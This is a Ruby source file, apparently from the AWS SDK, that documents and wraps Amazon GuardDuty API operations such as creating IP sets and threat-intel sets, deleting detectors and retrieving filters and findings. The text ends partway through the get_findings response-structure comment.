# Creates a new IPSet, which is called a trusted IP list in the console
# user interface. An IPSet is a list of IP addresses that are trusted
# for secure communication with AWS infrastructure and applications.
# GuardDuty doesn't generate findings for IP addresses that are
# included in IPSets. Only users from the master account can use this
# operation.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty account that you want
# to create an IPSet for.
#
# @option params [required, String] :name
# The user-friendly name to identify the IPSet.
#
# Allowed characters are alphanumerics, spaces, hyphens (-), and
# underscores (\_).
#
# @option params [required, String] :format
# The format of the file that contains the IPSet.
#
# @option params [required, String] :location
# The URI of the file that contains the IPSet. For example:
# https://s3.us-west-2.amazonaws.com/my-bucket/my-object-key.
#
# @option params [required, Boolean] :activate
# A Boolean value that indicates whether GuardDuty is to start using the
# uploaded IPSet.
#
# @option params [String] :client_token
# The idempotency token for the create request.
#
#   **A suitable default value is auto-generated.** You should normally
#   not need to pass this option.
#
# @option params [Hash<String,String>] :tags
# The tags to be added to a new IP set resource.
#
# @return [Types::CreateIPSetResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateIPSetResponse#ip_set_id #ip_set_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.create_ip_set({
# detector_id: "DetectorId", # required
# name: "Name", # required
# format: "TXT", # required, accepts TXT, STIX, OTX_CSV, ALIEN_VAULT, PROOF_POINT, FIRE_EYE
# location: "Location", # required
# activate: false, # required
# client_token: "ClientToken",
# tags: {
# "TagKey" => "TagValue",
# },
# })
#
# @example Response structure
#
# resp.ip_set_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/CreateIPSet AWS API Documentation
#
# @overload create_ip_set(params = {})
# @param [Hash] params ({})
def create_ip_set(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:create_ip_set, params).send_request(options)
end
# Creates member accounts of the current AWS account by specifying a
# list of AWS account IDs. The current AWS account can then invite these
# members to manage GuardDuty in their accounts.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty account that you want
# to associate member accounts with.
#
# @option params [required, Array<Types::AccountDetail>] :account_details
# A list of account ID and email address pairs of the accounts that you
# want to associate with the master GuardDuty account.
#
# @return [Types::CreateMembersResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateMembersResponse#unprocessed_accounts #unprocessed_accounts} => Array<Types::UnprocessedAccount>
#
# @example Request syntax with placeholder values
#
# resp = client.create_members({
# detector_id: "DetectorId", # required
# account_details: [ # required
# {
# account_id: "AccountId", # required
# email: "Email", # required
# },
# ],
# })
#
# @example Response structure
#
# resp.unprocessed_accounts #=> Array
# resp.unprocessed_accounts[0].account_id #=> String
# resp.unprocessed_accounts[0].result #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/CreateMembers AWS API Documentation
#
# @overload create_members(params = {})
# @param [Hash] params ({})
def create_members(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:create_members, params).send_request(options)
end
# Creates a publishing destination to export findings to. The resource
# to export findings to must exist before you use this operation.
#
# @option params [required, String] :detector_id
# The ID of the GuardDuty detector associated with the publishing
# destination.
#
# @option params [required, String] :destination_type
# The type of resource for the publishing destination. Currently only
# Amazon S3 buckets are supported.
#
# @option params [required, Types::DestinationProperties] :destination_properties
# The properties of the publishing destination, including the ARNs for
# the destination and the KMS key used for encryption.
#
# @option params [String] :client_token
# The idempotency token for the request.
#
#   **A suitable default value is auto-generated.** You should normally
#   not need to pass this option.
#
# @return [Types::CreatePublishingDestinationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreatePublishingDestinationResponse#destination_id #destination_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.create_publishing_destination({
# detector_id: "DetectorId", # required
# destination_type: "S3", # required, accepts S3
# destination_properties: { # required
# destination_arn: "String",
# kms_key_arn: "String",
# },
# client_token: "ClientToken",
# })
#
# @example Response structure
#
# resp.destination_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/CreatePublishingDestination AWS API Documentation
#
# @overload create_publishing_destination(params = {})
# @param [Hash] params ({})
def create_publishing_destination(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:create_publishing_destination, params).send_request(options)
end
# Generates example findings of types specified by the list of finding
# types. If 'NULL' is specified for `findingTypes`, the API generates
# example findings of all supported finding types.
#
# @option params [required, String] :detector_id
# The ID of the detector to create sample findings for.
#
# @option params [Array<String>] :finding_types
# The types of sample findings to generate.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.create_sample_findings({
# detector_id: "DetectorId", # required
# finding_types: ["FindingType"],
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/CreateSampleFindings AWS API Documentation
#
# @overload create_sample_findings(params = {})
# @param [Hash] params ({})
def create_sample_findings(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:create_sample_findings, params).send_request(options)
end
# Creates a new ThreatIntelSet. ThreatIntelSets consist of known
# malicious IP addresses. GuardDuty generates findings based on
# ThreatIntelSets. Only users of the master account can use this
# operation.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty account that you want
# to create a threatIntelSet for.
#
# @option params [required, String] :name
# A user-friendly ThreatIntelSet name displayed in all findings that are
# generated by activity that involves IP addresses included in this
# ThreatIntelSet.
#
# @option params [required, String] :format
# The format of the file that contains the ThreatIntelSet.
#
# @option params [required, String] :location
# The URI of the file that contains the ThreatIntelSet. For example:
# https://s3.us-west-2.amazonaws.com/my-bucket/my-object-key.
#
# @option params [required, Boolean] :activate
# A Boolean value that indicates whether GuardDuty is to start using the
# uploaded ThreatIntelSet.
#
# @option params [String] :client_token
# The idempotency token for the create request.
#
#   **A suitable default value is auto-generated.** You should normally
#   not need to pass this option.
#
# @option params [Hash<String,String>] :tags
# The tags to be added to a new threat list resource.
#
# @return [Types::CreateThreatIntelSetResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateThreatIntelSetResponse#threat_intel_set_id #threat_intel_set_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.create_threat_intel_set({
# detector_id: "DetectorId", # required
# name: "Name", # required
# format: "TXT", # required, accepts TXT, STIX, OTX_CSV, ALIEN_VAULT, PROOF_POINT, FIRE_EYE
# location: "Location", # required
# activate: false, # required
# client_token: "ClientToken",
# tags: {
# "TagKey" => "TagValue",
# },
# })
#
# @example Response structure
#
# resp.threat_intel_set_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/CreateThreatIntelSet AWS API Documentation
#
# @overload create_threat_intel_set(params = {})
# @param [Hash] params ({})
def create_threat_intel_set(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:create_threat_intel_set, params).send_request(options)
end
# Declines invitations sent to the current member account by AWS
# accounts specified by their account IDs.
#
# @option params [required, Array<String>] :account_ids
# A list of account IDs of the AWS accounts that sent invitations to the
# current member account that you want to decline invitations from.
#
# @return [Types::DeclineInvitationsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeclineInvitationsResponse#unprocessed_accounts #unprocessed_accounts} => Array<Types::UnprocessedAccount>
#
# @example Request syntax with placeholder values
#
# resp = client.decline_invitations({
# account_ids: ["AccountId"], # required
# })
#
# @example Response structure
#
# resp.unprocessed_accounts #=> Array
# resp.unprocessed_accounts[0].account_id #=> String
# resp.unprocessed_accounts[0].result #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DeclineInvitations AWS API Documentation
#
# @overload decline_invitations(params = {})
# @param [Hash] params ({})
def decline_invitations(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:decline_invitations, params).send_request(options)
end
# Deletes an Amazon GuardDuty detector that is specified by the detector
# ID.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that you want to delete.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_detector({
# detector_id: "DetectorId", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DeleteDetector AWS API Documentation
#
# @overload delete_detector(params = {})
# @param [Hash] params ({})
def delete_detector(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:delete_detector, params).send_request(options)
end
# Deletes the filter specified by the filter name.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that the filter is associated with.
#
# @option params [required, String] :filter_name
# The name of the filter that you want to delete.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_filter({
# detector_id: "DetectorId", # required
# filter_name: "String", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DeleteFilter AWS API Documentation
#
# @overload delete_filter(params = {})
# @param [Hash] params ({})
def delete_filter(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:delete_filter, params).send_request(options)
end
# Deletes the IPSet specified by the `ipSetId`. IPSets are called
# trusted IP lists in the console user interface.
#
# @option params [required, String] :detector_id
# The unique ID of the detector associated with the IPSet.
#
# @option params [required, String] :ip_set_id
# The unique ID of the IPSet to delete.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_ip_set({
# detector_id: "DetectorId", # required
# ip_set_id: "String", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DeleteIPSet AWS API Documentation
#
# @overload delete_ip_set(params = {})
# @param [Hash] params ({})
def delete_ip_set(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:delete_ip_set, params).send_request(options)
end
# Deletes invitations sent to the current member account by AWS accounts
# specified by their account IDs.
#
# @option params [required, Array<String>] :account_ids
# A list of account IDs of the AWS accounts that sent invitations to the
# current member account that you want to delete invitations from.
#
# @return [Types::DeleteInvitationsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteInvitationsResponse#unprocessed_accounts #unprocessed_accounts} => Array<Types::UnprocessedAccount>
#
# @example Request syntax with placeholder values
#
# resp = client.delete_invitations({
# account_ids: ["AccountId"], # required
# })
#
# @example Response structure
#
# resp.unprocessed_accounts #=> Array
# resp.unprocessed_accounts[0].account_id #=> String
# resp.unprocessed_accounts[0].result #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DeleteInvitations AWS API Documentation
#
# @overload delete_invitations(params = {})
# @param [Hash] params ({})
def delete_invitations(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:delete_invitations, params).send_request(options)
end
# Deletes GuardDuty member accounts (to the current GuardDuty master
# account) specified by the account IDs.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty account whose members
# you want to delete.
#
# @option params [required, Array<String>] :account_ids
# A list of account IDs of the GuardDuty member accounts that you want
# to delete.
#
# @return [Types::DeleteMembersResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteMembersResponse#unprocessed_accounts #unprocessed_accounts} => Array<Types::UnprocessedAccount>
#
# @example Request syntax with placeholder values
#
# resp = client.delete_members({
# detector_id: "DetectorId", # required
# account_ids: ["AccountId"], # required
# })
#
# @example Response structure
#
# resp.unprocessed_accounts #=> Array
# resp.unprocessed_accounts[0].account_id #=> String
# resp.unprocessed_accounts[0].result #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DeleteMembers AWS API Documentation
#
# @overload delete_members(params = {})
# @param [Hash] params ({})
def delete_members(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:delete_members, params).send_request(options)
end
# Deletes the publishing definition with the specified `destinationId`.
#
# @option params [required, String] :detector_id
# The unique ID of the detector associated with the publishing
# destination to delete.
#
# @option params [required, String] :destination_id
# The ID of the publishing destination to delete.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_publishing_destination({
# detector_id: "DetectorId", # required
# destination_id: "String", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DeletePublishingDestination AWS API Documentation
#
# @overload delete_publishing_destination(params = {})
# @param [Hash] params ({})
def delete_publishing_destination(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:delete_publishing_destination, params).send_request(options)
end
# Deletes the ThreatIntelSet specified by the ThreatIntelSet ID.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that the threatIntelSet is associated
# with.
#
# @option params [required, String] :threat_intel_set_id
# The unique ID of the threatIntelSet that you want to delete.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_threat_intel_set({
# detector_id: "DetectorId", # required
# threat_intel_set_id: "String", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DeleteThreatIntelSet AWS API Documentation
#
# @overload delete_threat_intel_set(params = {})
# @param [Hash] params ({})
def delete_threat_intel_set(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:delete_threat_intel_set, params).send_request(options)
end
# Returns information about the account selected as the delegated
# administrator for GuardDuty.
#
# @option params [required, String] :detector_id
# The ID of the detector to retrieve information about the delegated
# administrator from.
#
# @return [Types::DescribeOrganizationConfigurationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeOrganizationConfigurationResponse#auto_enable #auto_enable} => Boolean
# * {Types::DescribeOrganizationConfigurationResponse#member_account_limit_reached #member_account_limit_reached} => Boolean
#
# @example Request syntax with placeholder values
#
# resp = client.describe_organization_configuration({
# detector_id: "DetectorId", # required
# })
#
# @example Response structure
#
# resp.auto_enable #=> Boolean
# resp.member_account_limit_reached #=> Boolean
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DescribeOrganizationConfiguration AWS API Documentation
#
# @overload describe_organization_configuration(params = {})
# @param [Hash] params ({})
def describe_organization_configuration(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:describe_organization_configuration, params).send_request(options)
end
# Returns information about the publishing destination specified by the
# provided `destinationId`.
#
# @option params [required, String] :detector_id
# The unique ID of the detector associated with the publishing
# destination to retrieve.
#
# @option params [required, String] :destination_id
# The ID of the publishing destination to retrieve.
#
# @return [Types::DescribePublishingDestinationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribePublishingDestinationResponse#destination_id #destination_id} => String
# * {Types::DescribePublishingDestinationResponse#destination_type #destination_type} => String
# * {Types::DescribePublishingDestinationResponse#status #status} => String
# * {Types::DescribePublishingDestinationResponse#publishing_failure_start_timestamp #publishing_failure_start_timestamp} => Integer
# * {Types::DescribePublishingDestinationResponse#destination_properties #destination_properties} => Types::DestinationProperties
#
# @example Request syntax with placeholder values
#
# resp = client.describe_publishing_destination({
# detector_id: "DetectorId", # required
# destination_id: "String", # required
# })
#
# @example Response structure
#
# resp.destination_id #=> String
# resp.destination_type #=> String, one of "S3"
# resp.status #=> String, one of "PENDING_VERIFICATION", "PUBLISHING", "UNABLE_TO_PUBLISH_FIX_DESTINATION_PROPERTY", "STOPPED"
# resp.publishing_failure_start_timestamp #=> Integer
# resp.destination_properties.destination_arn #=> String
# resp.destination_properties.kms_key_arn #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DescribePublishingDestination AWS API Documentation
#
# @overload describe_publishing_destination(params = {})
# @param [Hash] params ({})
def describe_publishing_destination(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:describe_publishing_destination, params).send_request(options)
end
# Disables an AWS account within the Organization as the GuardDuty
# delegated administrator.
#
# @option params [required, String] :admin_account_id
# The AWS Account ID for the organizations account to be disabled as a
# GuardDuty delegated administrator.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.disable_organization_admin_account({
# admin_account_id: "String", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DisableOrganizationAdminAccount AWS API Documentation
#
# @overload disable_organization_admin_account(params = {})
# @param [Hash] params ({})
def disable_organization_admin_account(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:disable_organization_admin_account, params).send_request(options)
end
# Disassociates the current GuardDuty member account from its master
# account.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty member account.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.disassociate_from_master_account({
# detector_id: "DetectorId", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DisassociateFromMasterAccount AWS API Documentation
#
# @overload disassociate_from_master_account(params = {})
# @param [Hash] params ({})
def disassociate_from_master_account(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:disassociate_from_master_account, params).send_request(options)
end
# Disassociates GuardDuty member accounts (to the current GuardDuty
# master account) specified by the account IDs.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty account whose members
# you want to disassociate from the master account.
#
# @option params [required, Array<String>] :account_ids
# A list of account IDs of the GuardDuty member accounts that you want
# to disassociate from the master account.
#
# @return [Types::DisassociateMembersResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DisassociateMembersResponse#unprocessed_accounts #unprocessed_accounts} => Array<Types::UnprocessedAccount>
#
# @example Request syntax with placeholder values
#
# resp = client.disassociate_members({
# detector_id: "DetectorId", # required
# account_ids: ["AccountId"], # required
# })
#
# @example Response structure
#
# resp.unprocessed_accounts #=> Array
# resp.unprocessed_accounts[0].account_id #=> String
# resp.unprocessed_accounts[0].result #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DisassociateMembers AWS API Documentation
#
# @overload disassociate_members(params = {})
# @param [Hash] params ({})
def disassociate_members(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:disassociate_members, params).send_request(options)
end
# Enables an AWS account within the organization as the GuardDuty
# delegated administrator.
#
# @option params [required, String] :admin_account_id
# The AWS Account ID for the organization account to be enabled as a
# GuardDuty delegated administrator.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.enable_organization_admin_account({
# admin_account_id: "String", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/EnableOrganizationAdminAccount AWS API Documentation
#
# @overload enable_organization_admin_account(params = {})
# @param [Hash] params ({})
def enable_organization_admin_account(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:enable_organization_admin_account, params).send_request(options)
end
# Retrieves an Amazon GuardDuty detector specified by the detectorId.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that you want to get.
#
# @return [Types::GetDetectorResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetDetectorResponse#created_at #created_at} => String
# * {Types::GetDetectorResponse#finding_publishing_frequency #finding_publishing_frequency} => String
# * {Types::GetDetectorResponse#service_role #service_role} => String
# * {Types::GetDetectorResponse#status #status} => String
# * {Types::GetDetectorResponse#updated_at #updated_at} => String
# * {Types::GetDetectorResponse#tags #tags} => Hash<String,String>
#
# @example Request syntax with placeholder values
#
# resp = client.get_detector({
# detector_id: "DetectorId", # required
# })
#
# @example Response structure
#
# resp.created_at #=> String
# resp.finding_publishing_frequency #=> String, one of "FIFTEEN_MINUTES", "ONE_HOUR", "SIX_HOURS"
# resp.service_role #=> String
# resp.status #=> String, one of "ENABLED", "DISABLED"
# resp.updated_at #=> String
# resp.tags #=> Hash
# resp.tags["TagKey"] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/GetDetector AWS API Documentation
#
# @overload get_detector(params = {})
# @param [Hash] params ({})
def get_detector(params = {}, options = {})
  # Build the operation request, then dispatch it with the caller's options.
  build_request(:get_detector, params).send_request(options)
end
# Returns the details of the filter specified by the filter name.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that the filter is associated with.
#
# @option params [required, String] :filter_name
# The name of the filter you want to get.
#
# @return [Types::GetFilterResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetFilterResponse#name #name} => String
# * {Types::GetFilterResponse#description #description} => String
# * {Types::GetFilterResponse#action #action} => String
# * {Types::GetFilterResponse#rank #rank} => Integer
# * {Types::GetFilterResponse#finding_criteria #finding_criteria} => Types::FindingCriteria
# * {Types::GetFilterResponse#tags #tags} => Hash<String,String>
#
# @example Request syntax with placeholder values
#
# resp = client.get_filter({
# detector_id: "DetectorId", # required
# filter_name: "String", # required
# })
#
# @example Response structure
#
# resp.name #=> String
# resp.description #=> String
# resp.action #=> String, one of "NOOP", "ARCHIVE"
# resp.rank #=> Integer
# resp.finding_criteria.criterion #=> Hash
# resp.finding_criteria.criterion["String"].eq #=> Array
# resp.finding_criteria.criterion["String"].eq[0] #=> String
# resp.finding_criteria.criterion["String"].neq #=> Array
# resp.finding_criteria.criterion["String"].neq[0] #=> String
# resp.finding_criteria.criterion["String"].gt #=> Integer
# resp.finding_criteria.criterion["String"].gte #=> Integer
# resp.finding_criteria.criterion["String"].lt #=> Integer
# resp.finding_criteria.criterion["String"].lte #=> Integer
# resp.finding_criteria.criterion["String"].equals #=> Array
# resp.finding_criteria.criterion["String"].equals[0] #=> String
# resp.finding_criteria.criterion["String"].not_equals #=> Array
# resp.finding_criteria.criterion["String"].not_equals[0] #=> String
# resp.finding_criteria.criterion["String"].greater_than #=> Integer
# resp.finding_criteria.criterion["String"].greater_than_or_equal #=> Integer
# resp.finding_criteria.criterion["String"].less_than #=> Integer
# resp.finding_criteria.criterion["String"].less_than_or_equal #=> Integer
# resp.tags #=> Hash
# resp.tags["TagKey"] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/GetFilter AWS API Documentation
#
# @overload get_filter(params = {})
# @param [Hash] params ({})
def get_filter(params = {}, options = {})
  # Build the GetFilter request and dispatch it in one chained call.
  build_request(:get_filter, params).send_request(options)
end
# Describes Amazon GuardDuty findings specified by finding IDs.
#
# @option params [required, String] :detector_id
# The ID of the detector that specifies the GuardDuty service whose
# findings you want to retrieve.
#
# @option params [required, Array<String>] :finding_ids
# The IDs of the findings that you want to retrieve.
#
# @option params [Types::SortCriteria] :sort_criteria
# Represents the criteria used for sorting findings.
#
# @return [Types::GetFindingsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetFindingsResponse#findings #findings} => Array<Types::Finding>
#
# @example Request syntax with placeholder values
#
# resp = client.get_findings({
# detector_id: "DetectorId", # required
# finding_ids: ["FindingId"], # required
# sort_criteria: {
# attribute_name: "String",
# order_by: "ASC", # accepts ASC, DESC
# },
# })
#
# @example Response structure
#
# resp.findings #=> Array
# resp.findings[0].account_id #=> String
# resp.findings[0].arn #=> String
# resp.findings[0].confidence #=> Float
# resp.findings[0].created_at #=> String
# resp.findings[0].description #=> String
# resp.findings[0].id #=> String
# resp.findings[0].partition #=> String
# resp.findings[0].region #=> String
# resp.findings[0].resource.access_key_details.access_key_id #=> String
# resp.findings[0].resource.access_key_details.principal_id #=> String
# resp.findings[0].resource.access_key_details.user_name #=> String
# resp.findings[0].resource.access_key_details.user_type #=> String
# resp.findings[0].resource.s3_bucket_details #=> Array
# resp.findings[0].resource.s3_bucket_details[0].arn #=> String
# resp.findings[0].resource.s3_bucket_details[0].name #=> String
# resp.findings[0].resource.s3_bucket_details[0].type #=> String
# resp.findings[0].resource.s3_bucket_details[0].created_at #=> Time
# resp.findings[0].resource.s3_bucket_details[0].owner.id #=> String
# resp.findings[0].resource.s3_bucket_details[0].tags #=> Array
# resp.findings[0].resource.s3_bucket_details[0].tags[0].key #=> String
# resp.findings[0].resource.s3_bucket_details[0].tags[0].value #=> String
# resp.findings[0].resource.s3_bucket_details[0].default_server_side_encryption.encryption_type #=> String
# resp.findings[0].resource.s3_bucket_details[0].default_server_side_encryption.kms_master_key_arn #=> String
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.bucket_level_permissions.access_control_list.allows_public_read_access #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.bucket_level_permissions.access_control_list.allows_public_write_access #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.bucket_level_permissions.bucket_policy.allows_public_read_access #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.bucket_level_permissions.bucket_policy.allows_public_write_access #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.bucket_level_permissions.block_public_access.ignore_public_acls #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.bucket_level_permissions.block_public_access.restrict_public_buckets #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.bucket_level_permissions.block_public_access.block_public_acls #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.bucket_level_permissions.block_public_access.block_public_policy #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.account_level_permissions.block_public_access.ignore_public_acls #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.account_level_permissions.block_public_access.restrict_public_buckets #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.account_level_permissions.block_public_access.block_public_acls #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.account_level_permissions.block_public_access.block_public_policy #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.effective_permission #=> String
# resp.findings[0].resource.instance_details.availability_zone #=> String
# resp.findings[0].resource.instance_details.iam_instance_profile.arn #=> String
# resp.findings[0].resource.instance_details.iam_instance_profile.id #=> String
# resp.findings[0].resource.instance_details.image_description #=> String
# resp.findings[0].resource.instance_details.image_id #=> String
# resp.findings[0].resource.instance_details.instance_id #=> String
# resp.findings[0].resource.instance_details.instance_state #=> String
# resp.findings[0].resource.instance_details.instance_type #=> String
# resp.findings[0].resource.instance_details.outpost_arn #=> String
# resp.findings[0].resource.instance_details.launch_time #=> String
# resp.findings[0].resource.instance_details.network_interfaces #=> Array
# resp.findings[0].resource.instance_details.network_interfaces[0].ipv_6_addresses #=> Array
# resp.findings[0].resource.instance_details.network_interfaces[0].ipv_6_addresses[0] #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].network_interface_id #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].private_dns_name #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].private_ip_address #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].private_ip_addresses #=> Array
# resp.findings[0].resource.instance_details.network_interfaces[0].private_ip_addresses[0].private_dns_name #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].private_ip_addresses[0].private_ip_address #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].public_dns_name #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].public_ip #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].security_groups #=> Array
# resp.findings[0].resource.instance_details.network_interfaces[0].security_groups[0].group_id #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].security_groups[0].group_name #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].subnet_id #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].vpc_id #=> String
# resp.findings[0].resource.instance_details.platform #=> String
# resp.findings[0].resource.instance_details.product_codes #=> Array
# resp.findings[0].resource.instance_details.product_codes[0].code #=> String
# resp.findings[0].resource.instance_details.product_codes[0].product_type #=> String
# resp.findings[0].resource.instance_details.tags #=> Array
# resp.findings[0].resource.instance_details.tags[0].key #=> String
# resp.findings[0].resource.instance_details.tags[0].value #=> String
# resp.findings[0].resource.resource_type #=> String
# resp.findings[0].schema_version #=> String
# resp.findings[0].service.action.action_type #=> String
# resp.findings[0].service.action.aws_api_call_action.api #=> String
# resp.findings[0].service.action.aws_api_call_action.caller_type #=> String
# resp.findings[0].service.action.aws_api_call_action.domain_details.domain #=> String
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.city.city_name #=> String
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.country.country_code #=> String
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.country.country_name #=> String
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.geo_location.lat #=> Float
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.geo_location.lon #=> Float
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.ip_address_v4 #=> String
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.organization.asn #=> String
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.organization.asn_org #=> String
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.organization.isp #=> String
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.organization.org #=> String
# resp.findings[0].service.action.aws_api_call_action.service_name #=> String
# resp.findings[0].service.action.dns_request_action.domain #=> String
# resp.findings[0].service.action.network_connection_action.blocked #=> Boolean
# resp.findings[0].service.action.network_connection_action.connection_direction #=> String
# resp.findings[0].service.action.network_connection_action.local_port_details.port #=> Integer
# resp.findings[0].service.action.network_connection_action.local_port_details.port_name #=> String
